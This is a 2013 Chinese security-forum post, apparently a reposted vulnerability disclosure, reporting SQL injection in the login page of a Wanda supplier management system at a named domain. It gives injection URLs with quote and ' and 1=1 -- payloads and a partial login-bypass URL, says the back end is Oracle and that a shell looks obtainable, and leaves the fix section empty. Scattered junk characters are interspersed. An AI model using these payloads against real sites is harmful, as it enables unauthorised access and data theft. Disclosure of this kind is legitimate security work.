中国网络渗透测试联盟

标题: 万达供应商系统SQL注射漏洞 [打印本页]

---

作者: admin    时间: 2013-3-24 20:16
标题: 万达供应商系统SQL注射漏洞
简要描述：万达某分站sql注入。敏感信息泄露。
详细说明：
万达scm系统登陆框sql注入。
/ [7 b7 L3 y" s" [$ [
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
, t" W$ [! U) {' X9 y
  D1 _, ]4 V) @) k! V
500错误。
' T, ?3 q. X' t0 B1 F
( l% J; `5 i4 ~- x  ~+ R+ Y用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
  l! V. [8 I0 k% i8 W. K# Z9 p! A截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
经过分析，登陆验证的过程应该是：

取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png

, \* O: G1 n$ v, w3 R7 uoracle数据库，存在注入点。@大连万达，你怎么看？
  f' X# T7 K# f6 zhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png

系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
漏洞证明：
万达scm系统登陆框sql注入。
1 |3 M- E, C6 u" N2 l) ]
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27

- K& i  B, j0 g( o3 T. Z
/ X" o  B& P* A$ U, }% @9 N500错误。
6 O& ?; c% p6 M2 g- Z( R4 o  {
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
* u+ T9 i, j3 m, T/ o- Qhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png

7 X. P: c8 ~1 Z# F4 t+ U
（截图有一点问题）

怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

5 {& p3 u% G" b+ ]" o& E取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
3 o/ @# z" u9 E% y! ?. O
绕过：
5 D( m: U, T5 y2 F) y$ X& e" Jhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1


oracle数据库，存在注入点。@大连万达，你怎么看？
; m5 [) H6 L, G- z+ }. M​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。
- a# V1 t; [" `  C& Z$ Q
0 w$ c. ~. L! U+ @$ q  @+ j2 y+ w# O修复方案：
。。。


厂商已经确认

[/td][/tr]
[/table]

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2